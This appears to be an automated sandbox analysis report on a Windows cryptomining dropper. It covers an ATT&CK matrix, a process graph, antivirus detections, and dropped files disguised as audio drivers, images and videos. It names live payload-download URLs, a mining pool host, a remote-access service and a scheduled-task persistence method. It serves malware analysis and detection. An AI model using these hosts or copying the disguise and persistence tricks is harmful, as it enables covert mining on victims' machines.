                            DLL Side-Loading
                            1
                            Deobfuscate/Decode Files or Information
                            OS Credential Dumping1
                            System Time Discovery
                            Remote Services1
                            Screen Capture
                            1
                            Non-Application Layer Protocol
                            Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Native API
                            1
                            DLL Side-Loading
                            1
                            Windows Service
                            21
                            Obfuscated Files or Information
                            LSASS Memory1
                            Peripheral Device Discovery
                            Remote Desktop Protocol3
                            Clipboard Data
                            1
                            Application Layer Protocol
                            Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts12
                            Command and Scripting Interpreter
                            1
                            Windows Service
                            22
                            Process Injection
                            1
                            Software Packing
                            Security Account Manager3
                            File and Directory Discovery
                            SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCron2
                            Registry Run Keys / Startup Folder
                            2
                            Registry Run Keys / Startup Folder
                            1
                            DLL Side-Loading
                            NTDS35
                            System Information Discovery
                            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchd1
                            Bootkit
                            Network Logon Script141
                            Masquerading
                            LSA Secrets211
                            Security Software Discovery
                            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Modify Registry
                            Cached Domain Credentials1
                            Virtualization/Sandbox Evasion
                            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            Virtualization/Sandbox Evasion
                            DCSync3
                            Process Discovery
                            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
                            Process Injection
                            Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                            Bootkit
                            /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1467765 Sample: K4gsPJGEi4 Startdate: 04/07/2024 Architecture: WINDOWS Score: 100 79 auto.c3pool.org 2->79 81 auth11.aeroadmin.com 2->81 91 Malicious sample detected (through community Yara rule) 2->91 93 Antivirus detection for dropped file 2->93 95 Antivirus / Scanner detection for submitted sample 2->95 97 12 other signatures 2->97 12 K4gsPJGEi4.exe 9 2->12         started        signatures3 process4 file5 71 C:\Users\user\AppData\Local\Temp\cmdow.exe, PE32 12->71 dropped 73 C:\Users\user\AppData\...\WinRing0x64.txt, PE32+ 12->73 dropped 75 C:\Users\user\AppData\...\Systemfont.txt, PE32 12->75 dropped 77 5 other files (4 malicious) 12->77 dropped 117 Found strings related to Crypto-Mining 12->117 16 cmd.exe 1 12->16         started        signatures6 process7 signatures8 83 Potential malicious VBS script found (suspicious strings) 16->83 85 Uses cmd line tools excessively to alter registry or file data 16->85 87 Drops PE files to the user root directory 16->87 89 Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes) 16->89 19 cmd.exe 3 9 16->19         started        23 conhost.exe 16->23         started        process9 file10 63 C:\Users\user\AppData\Local\Temp\two.cmd, DOS 19->63 dropped 65 C:\Users\user\AppData\Local\Temp\est1.vbs, ASCII 19->65 dropped 67 C:\Users\user\AppData\Local\Temp\est1.cmd, ASCII 19->67 dropped 69 C:\Users\user\AppData\Local\Temp\Vnoad.vbs, ASCII 19->69 dropped 105 Command shell drops VBS files 19->105 107 Uses cmd line tools excessively to alter registry or file data 19->107 25 wscript.exe 1 19->25         started        27 wscript.exe 2 1 19->27         started        30 timeout.exe 1 19->30         started        32 7 other processes 19->32 109 Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes) 23->109 signatures11 process12 signatures13 34 cmd.exe 61 25->34         started        113 Windows Scripting host queries suspicious COM object (likely to drop second stage) 27->113 115 Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes) 27->115 38 cmd.exe 2 27->38         started        process14 file15 55 C:\Windows\SysWOW64\en\cm.avi, PE32 34->55 dropped 57 C:\Windows\SysWOW64\en\Sy.avi, PE32 34->57 dropped 59 C:\Windows\SysWOW64\en\Ri.avi, PE32+ 34->59 dropped 61 30 other files (26 malicious) 34->61 dropped 99 Command shell drops VBS files 34->99 101 Uses cmd line tools excessively to alter registry or file data 34->101 103 Sample is not signed and drops a device driver 34->103 40 WMIC.exe 34->40         started        43 findstr.exe 34->43         started        45 WMIC.exe 34->45         started        49 29 other processes 34->49 47 conhost.exe 38->47         started        signatures16 process17 signatures18 111 Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes) 40->111 51 Conhost.exe 43->51         started        53 Conhost.exe 45->53         started        process19

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand
                            SourceDetectionScannerLabelLink
                            K4gsPJGEi4.exe100%AviraHEUR/AGEN.1343021
                            K4gsPJGEi4.exe100%Joe Sandbox ML
                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\IntelSvc.exe100%AviraTR/Redcap.mzcqf
                            C:\ProgramData\IntelSvc.exe100%AviraTR/Redcap.mzcqf
                            C:\ProgramData\IntelSvc.exe100%AviraTR/Redcap.mzcqf
                            C:\Users\user\AppData\Local\Temp\RtkAudio.txt100%AviraTR/CoinMiner.cywuh
                            C:\Users\user\AppData\Local\Temp\Start.cmd100%AviraBAT/Dldr.Agent.VPC
                            C:\Users\user\AppData\Local\Temp\Systemfont.exe100%AviraHEUR/AGEN.1320122
                            C:\Users\Public\RtkAudio.exe100%AviraTR/CoinMiner.cywuh
                            C:\Users\user\AppData\Local\Temp\Systemfont.txt100%AviraHEUR/AGEN.1320122
                            C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpg100%AviraTR/Redcap.mzcqf
                            C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg100%AviraTR/CoinMiner.cywuh
                            C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpg100%AviraHEUR/AGEN.1320122
                            C:\Users\Public\RtkAudio.exe100%AviraTR/CoinMiner.cywuh
                            C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe100%AviraTR/Redcap.mzcqf
                            C:\Users\Public\RtkAudio.exe100%AviraTR/CoinMiner.cywuh
                            C:\ProgramData\IntelSvc.exe100%AviraTR/Redcap.mzcqf
                            C:\ProgramData\screen.exe100%Joe Sandbox ML
                            C:\ProgramData\screen.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\RtkAudio.txt100%Joe Sandbox ML
                            C:\Users\Public\RtkAudio.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpg100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg100%Joe Sandbox ML
                            C:\Users\Public\RtkAudio.exe100%Joe Sandbox ML
                            C:\Users\Public\RtkAudio.exe100%Joe Sandbox ML
                            C:\ProgramData\IntelSvc.exe79%ReversingLabsWin32.Trojan.Mamson
                            C:\ProgramData\cmdow.exe39%ReversingLabsWin32.Hacktool.CmDow
                            C:\ProgramData\screen.exe12%ReversingLabs
                            C:\Users\Public\IntelSvc.exe79%ReversingLabsWin32.Trojan.Mamson
                            C:\Users\Public\RtkAudio.exe83%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                            C:\Users\Public\WinRing0x64.sys5%ReversingLabs
                            C:\Users\Public\cmdow.exe39%ReversingLabsWin32.Hacktool.CmDow
                            C:\Users\Public\screen.exe12%ReversingLabs
                            C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe79%ReversingLabsWin32.Trojan.Mamson
                            C:\Users\user\AppData\Local\Temp\IntelSvc.exe79%ReversingLabsWin32.Trojan.Mamson
                            C:\Users\user\AppData\Local\Temp\RtkAudio.exe83%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                            C:\Users\user\AppData\Local\Temp\RtkAudio.txt83%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                            C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe47%ReversingLabsWin32.Trojan.Malgent
                            C:\Users\user\AppData\Local\Temp\Systemfont.exe64%ReversingLabsWin32.Trojan.Tiggre
                            C:\Users\user\AppData\Local\Temp\Systemfont.txt64%ReversingLabsWin32.Trojan.Tiggre
                            C:\Users\user\AppData\Local\Temp\Tfile\IntelSvc.exe79%ReversingLabsWin32.Trojan.Mamson
                            C:\Users\user\AppData\Local\Temp\Tfile\RtkAudio.exe83%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                            C:\Users\user\AppData\Local\Temp\Tweaker\Aud.jpg83%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                            C:\Users\user\AppData\Local\Temp\Tweaker\IntelS.jpg79%ReversingLabsWin32.Trojan.Mamson
                            C:\Users\user\AppData\Local\Temp\Tweaker\Ring0x.jpg5%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\Tweaker\Systemfo.jpg64%ReversingLabsWin32.Trojan.Tiggre
                            C:\Users\user\AppData\Local\Temp\Tweaker\cmdo.jpg39%ReversingLabsWin32.Hacktool.CmDow
                            C:\Users\user\AppData\Local\Temp\Tweaker\scre.jpg12%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\WinRing0x64.sys5%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\WinRing0x64.txt5%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\cmdow.exe39%ReversingLabsWin32.Hacktool.CmDow
                            C:\Users\user\AppData\Local\Temp\screen.exe12%ReversingLabs
                            C:\Users\user\AppData\Local\Temp\tv_x86.exe79%ReversingLabsWin32.Trojan.Mamson
                            C:\Windows\SysWOW64\RuntimeBroker.exe47%ReversingLabsWin32.Trojan.Malgent
                            C:\Windows\SysWOW64\en\Au.avi83%ReversingLabsWin64.Trojan.DisguisedXMRigMiner
                            C:\Windows\SysWOW64\en\In.avi79%ReversingLabsWin32.Trojan.Mamson
                            C:\Windows\SysWOW64\en\Ri.avi5%ReversingLabs
                            C:\Windows\SysWOW64\en\Sy.avi64%ReversingLabsWin32.Trojan.Tiggre
                            C:\Windows\SysWOW64\en\cm.avi39%ReversingLabsWin32.Hacktool.CmDow
                            C:\Windows\SysWOW64\en\sc.avi12%ReversingLabs
                            No Antivirus matches
                            No Antivirus matches
                            SourceDetectionScannerLabelLink
                            http://www.nirsoft.netopenIf0%Avira URL Cloudsafe
                            http://xemhang.vn/Website1/All/recoverdv.txt0%Avira URL Cloudsafe
                            http://www.commandline.co.uk.0%Avira URL Cloudsafe
                            http://xemhang.vn/Website1/All/FixT3N24.txt0%Avira URL Cloudsafe
                            http://900100.net0%Avira URL Cloudsafe
                            http://nircmd.nirsoft.net/%s.html0%Avira URL Cloudsafe
                            https://xmrig.com/wizard%s0%Avira URL Cloudsafe
                            http://sancovat.com/Website1/All/FixT3N24.txt0%Avira URL Cloudsafe
                            https://xmrig.com/docs/algorithms0%Avira URL Cloudsafe
                            http://sancovat.com/Website1/All/recoverview.txt0%Avira URL Cloudsafe
                            http://xemhang.vn/Website1/All/recoverview.txt0%Avira URL Cloudsafe
                            https://xmrig.com/benchmark/%s0%Avira URL Cloudsafe
                            http://nircmd.nirsoft.net/%s.htmlhttp://nircmd.nirsoft.net0%Avira URL Cloudsafe
                            http://www.aeroadmin.com/warning_btn_buylimit_titleback_warning_buy/index.html?src=aa_/buy.html?src=0%Avira URL Cloudsafe
                            https://xmrig.com/wizard0%Avira URL Cloudsafe
                            https://ulm.aeroadmin.com/build_numberCould0%Avira URL Cloudsafe
                            http://nircmd.nirsoft.net0%Avira URL Cloudsafe
                            http://www.nirsoft.net0%Avira URL Cloudsafe
                            http://nssm.cc/h0%Avira URL Cloudsafe
                            NameIPActiveMaliciousAntivirus DetectionReputation
                            auth11.aeroadmin.com
                            89.40.115.70
                            truefalse
                              unknown
                              auto.c3pool.org
                              5.75.158.61
                              truefalse
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nircmd.nirsoft.net/%s.htmlscreen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://xemhang.vn/Website1/All/recoverdv.txtK4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.nirsoft.netopenIfscreen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://xemhang.vn/Website1/All/FixT3N24.txtK4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://sancovat.com/Website1/All/recoverview.txtK4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://900100.netK4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://xmrig.com/wizard%sK4gsPJGEi4.exe, RtkAudio.txt.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://sancovat.com/Website1/All/FixT3N24.txtK4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://xmrig.com/docs/algorithmsK4gsPJGEi4.exe, RtkAudio.txt.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.commandline.co.uk.K4gsPJGEi4.exe, cmdow.exe0.15.dr, cmdow.exe.15.dr, cm.avi.15.dr, cmdo.jpg.15.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://xmrig.com/benchmark/%sK4gsPJGEi4.exe, RtkAudio.txt.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.nirsoft.netscreen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://xemhang.vn/Website1/All/recoverview.txtK4gsPJGEi4.exe, 00000000.00000003.2164211279.0000000002D34000.00000004.00001000.00020000.00000000.sdmp, Start.cmd.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://xmrig.com/wizardK4gsPJGEi4.exe, RtkAudio.txt.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://nircmd.nirsoft.net/%s.htmlhttp://nircmd.nirsoft.netscreen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.aeroadmin.com/warning_btn_buylimit_titleback_warning_buy/index.html?src=aa_/buy.html?src=K4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://nssm.cc/hK4gsPJGEi4.exe, RuntimeBroker.exe.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://ulm.aeroadmin.com/build_numberCouldK4gsPJGEi4.exe, IntelSvc.exe.0.dr, IntelSvc.exe1.15.dr, tv_x86.exe.15.dr, IntelSvc.exe0.15.dr, In.avi.15.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://nircmd.nirsoft.netscreen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                No contacted IP infos
                                Joe Sandbox version:40.0.0 Tourmaline
                                Analysis ID:1467765
                                Start date and time:2024-07-04 18:07:53 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 58s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:53
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:K4gsPJGEi4.exe
                                (renamed file extension from none to exe, renamed because original name is a hash value)
                                Original Sample Name:a606d29ead61ee09f59236f0c105763d1e3aba914edc30210425049ad5ce275b
                                Detection:MAL
                                Classification:mal100.evad.mine.winEXE@259/88@2/0
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 57%
                                • Number of executed functions: 8
                                • Number of non-executed functions: 114
                                • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
                                • Excluded IPs from analysis (whitelisted): 52.165.165.26, 173.222.108.147, 173.222.108.210, 20.3.187.198, 20.166.126.56, 88.221.110.91, 2.16.100.168
                                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                • Report size getting too big, too many NtSetInformationFile calls found.
                                • Report size getting too big, too many NtWriteVirtualMemory calls found.
                                • VT rate limit hit for: K4gsPJGEi4.exe
                                TimeTypeDescription
                                12:09:04API Interceptor9x Sleep call for process: WMIC.exe modified
                                18:09:35Task SchedulerRun new task: OneDrv path: "C:\Users\user\AppData\Local\OneDrive\fontdrvhots.exe"
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                auth11.aeroadmin.comview.exeGet hashmaliciousXmrigBrowse
                                • 37.48.87.53
                                auto.c3pool.orgx00zm3KVwb.exeGet hashmaliciousXmrigBrowse
                                • 88.198.117.174
                                4xHN38uqxB.exeGet hashmaliciousDoublePulsar, ETERNALBLUE, XmrigBrowse
                                • 5.161.70.189
                                UO2z4n1Sxx.exeGet hashmaliciousUnknownBrowse
                                • 88.198.117.174
                                4xHN38uqxB.exeGet hashmaliciousXmrigBrowse
                                • 88.198.117.174
                                c3p.exeGet hashmaliciousXmrigBrowse
                                • 88.198.117.174
                                SecuriteInfo.com.FileRepMalware.25283.7828.exeGet hashmaliciousBlackMoonBrowse
                                • 5.161.70.189
                                pg_ctlk.exeGet hashmaliciousXmrigBrowse
                                • 188.34.196.123
                                logor.elfGet hashmaliciousXmrigBrowse
                                • 5.161.70.189
                                qk6CviFPOs.exeGet hashmaliciousXmrigBrowse
                                • 5.161.70.189
                                http://198.255.70.77:19490/spread.txtGet hashmaliciousETERNALBLUEBrowse
                                • 5.161.50.27
                                No context
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\ProgramData\screen.exe3M5zLUqPrc.batGet hashmaliciousQuasarBrowse
                                  Uni.batGet hashmaliciousQuasarBrowse
                                    Uni.batGet hashmaliciousQuasarBrowse
                                      BRIXN3tYRY.exeGet hashmaliciousUnknownBrowse
                                        KMSpico.batGet hashmaliciousQuasarBrowse
                                          Tb5ydKLe0P.exeGet hashmaliciousRemcosBrowse
                                            kJoDqmpElg.exeGet hashmaliciousRemcosBrowse
                                              setup.exeGet hashmaliciousRedLineBrowse
                                                9SNCHbNBia.exeGet hashmaliciousBabadeda, MeterpreterBrowse
                                                  Tyrant.exeGet hashmaliciousUnknownBrowse
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3241944
                                                    Entropy (8bit):6.300666139752175
                                                    Encrypted:false
                                                    SSDEEP:49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
                                                    MD5:A7CDE18F991E97037A7899B7669E2548
                                                    SHA1:0FD0B96FF150A1ECF93206C227A13148933F28CE
                                                    SHA-256:8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
                                                    SHA-512:1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: Avira, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):88576
                                                    Entropy (8bit):6.15492829325332
                                                    Encrypted:false
                                                    SSDEEP:1536:ufVX5SG8cD++OTJ5enxjSiXkSxf5DqWtp0XU1jDBBrjK8o3agdbx583+fs7k+nUI:O5SG7S6/7k+nUwoL1xii2l8NXQUQUlC
                                                    MD5:DDD12566B99343B96609AFA2524ECEC3
                                                    SHA1:8FEF2C2BC87EF7D135296FDB4CF9ECD9C0322D55
                                                    SHA-256:767B877E735C425BF05C34683356ABFDE4070B092F17A4741EA5AC490611F3DE
                                                    SHA-512:B11A36B25B5C34CD86C367C4003F76F360965FDBC67CA1F30AFEC3A744D419C03D70ADE2423AD6A1D2858561F732DB9F1D1A279A37B045F8A5FAA9C53DBE30BD
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....T.....................V...N................@.................................z......... .....................................................................................................................T................................text...<...........................`.P`.data...\...........................@.`..rdata..`V.......X..................@.`@.eh_fram.....p.......D..............@.0@.bss....tL............................`..idata...............H..............@.0..CRT.................V..............@.0..tls.... ............X..............@.0.................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                    Category:dropped
                                                    Size (bytes):45568
                                                    Entropy (8bit):7.750275657742685
                                                    Encrypted:false
                                                    SSDEEP:768:UDR7drWxRrYJAgERvFAREX5DyzaccyOkVDIBF9K/phcanwUaajMIWCW2jsV:2A3cJAgmSRC5DcLxIBLGwUgIW2sV
                                                    MD5:A1CD6A64E8F8AD5D4B6C07DC4113C7EC
                                                    SHA1:60E2F48A51C061BBA72A08F34BE781354F87AA49
                                                    SHA-256:B994AE5CBFB5AD308656E9A8BF7A4A866FDEB9E23699F89F048D7F92E6BB8577
                                                    SHA-512:87A42901A63793653D49F1C6D410A429CABB470B4C340C4553CBD9ECCACB38D8543F85455465E0A432D737E950C590175DAD744094861F7C3E575446A65B41E8
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                    • Antivirus: ReversingLabs, Detection: 12%
                                                    Joe Sandbox View:
                                                    • Filename: 3M5zLUqPrc.bat, Detection: malicious, Browse
                                                    • Filename: Uni.bat, Detection: malicious, Browse
                                                    • Filename: Uni.bat, Detection: malicious, Browse
                                                    • Filename: BRIXN3tYRY.exe, Detection: malicious, Browse
                                                    • Filename: KMSpico.bat, Detection: malicious, Browse
                                                    • Filename: Tb5ydKLe0P.exe, Detection: malicious, Browse
                                                    • Filename: kJoDqmpElg.exe, Detection: malicious, Browse
                                                    • Filename: setup.exe, Detection: malicious, Browse
                                                    • Filename: 9SNCHbNBia.exe, Detection: malicious, Browse
                                                    • Filename: Tyrant.exe, Detection: malicious, Browse
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L...-'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):3241944
                                                    Entropy (8bit):6.300666139752175
                                                    Encrypted:false
                                                    SSDEEP:49152:RyBkRdnKQlYeEesgIMIbVSRsyMwJwTStnkoxCnKgyNOnJR:WkAe+Vm2wnndeKg5
                                                    MD5:A7CDE18F991E97037A7899B7669E2548
                                                    SHA1:0FD0B96FF150A1ECF93206C227A13148933F28CE
                                                    SHA-256:8B9F1FA5F941C7F46B65BF8929CA80D132435151E1DCB3A5DE7693B70B254467
                                                    SHA-512:1D73B9A3B8866AB9CCAC32BB97A63062D2A8C5152D83E5681EF1227B2DAB1D56CCC4D4FDB05C5FBA55A4CB27DE77592A509E1211D05F2F1811E19FDFA88FED50
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 79%
                                                    Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$....................Q.......Q...K...Q.........g....{;$....................b...........`......p...........w.......w.......t....w......Rich...........................PE..L...z..a.................P...X...............`....@...........................4......42...@...................................#.......1..C............/..1...P3.<...@6!.T...................87!......6!.@............`...............................text....O.......P.................. ..`.rdata..\....`.......T..............@..@.data...t.....#.......#.............@....rsrc....C....1..D...x-.............@..@.reloc..<....P3......./.............@..B........................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                    File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                    Category:dropped
                                                    Size (bytes):8331776
                                                    Entropy (8bit):6.602098080859404
                                                    Encrypted:false
                                                    SSDEEP:98304:C+U9oUzsxBTVgMY9Sh+a+XkHzrkg8wBYzS0XMqdazDU1Cf1bkUTktjT1/TW2L8mh:DVBTTT/Y7Te1LWZH7lDsnNk1ws
                                                    MD5:A6D4706BAEB9AB97490D745F7A2BB11E
                                                    SHA1:A5C96F75D41F1CA22B5B4F66DA15595341AA2EF2
                                                    SHA-256:96D24D557AB0BA58EE36350D2D0EDFDA6EE0E29515C254870789D1CCD6A5CE00
                                                    SHA-512:5D982A8C2F85E9C66E361E659B98891A37009179931DAE06BA0A455A49D1D9FBF4F9FEF93092C320989B09D9D613E48F1453CCEADCD772B6A750F15305AF48AB
                                                    Malicious:true
                                                    Yara Hits:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\Public\RtkAudio.exe, Author: Joe Security
                                                    • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\Public\RtkAudio.exe, Author: unknown
                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\Public\RtkAudio.exe, Author: Florian Roth
                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\Public\RtkAudio.exe, Author: ditekSHen
